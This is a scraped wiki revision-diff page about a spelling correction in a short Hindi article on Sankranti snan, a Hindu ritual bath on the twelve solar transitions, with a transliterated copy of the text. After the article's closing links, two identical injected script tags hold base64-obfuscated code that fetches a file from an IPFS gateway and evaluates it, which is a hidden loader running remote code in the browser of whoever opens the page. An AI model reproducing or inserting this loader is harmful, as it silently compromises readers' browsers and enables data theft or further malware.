Difference between revisions of "संक्रान्ति स्नान"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " {{लेख प्रगति |आधार=आधार1 |प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}" to "")
m (Text replace - "उल्लखित" to "उल्लिखित")
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*धर्मशास्त्र<ref>धर्मशास्त्र का अध्याय 11</ref> में इसका उल्लेख है।
 
*धर्मशास्त्र<ref>धर्मशास्त्र का अध्याय 11</ref> में इसका उल्लेख है।
 
*हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 2, 728-730, देवीपुराण से उद्धरण)</ref> में जल में कुछ डालकर 12 संक्रान्तियों पर स्नान करने की विधि है।
 
*हेमाद्रि<ref>हेमाद्रि (व्रतखण्ड 2, 728-730, देवीपुराण से उद्धरण)</ref> में जल में कुछ डालकर 12 संक्रान्तियों पर स्नान करने की विधि है।

Revision as of 18:50, 25 February 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • dharmashastr[1] mean isaka ullekh hai.
  • hemadri[2] mean jal mean kuchh dalakar 12 sankrantiyoan par snan karane ki vidhi hai.

tika tippani aur sandarbh

  1. dharmashastr ka adhyay 11
  2. hemadri (vratakhand 2, 728-730, devipuran se uddharan)

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>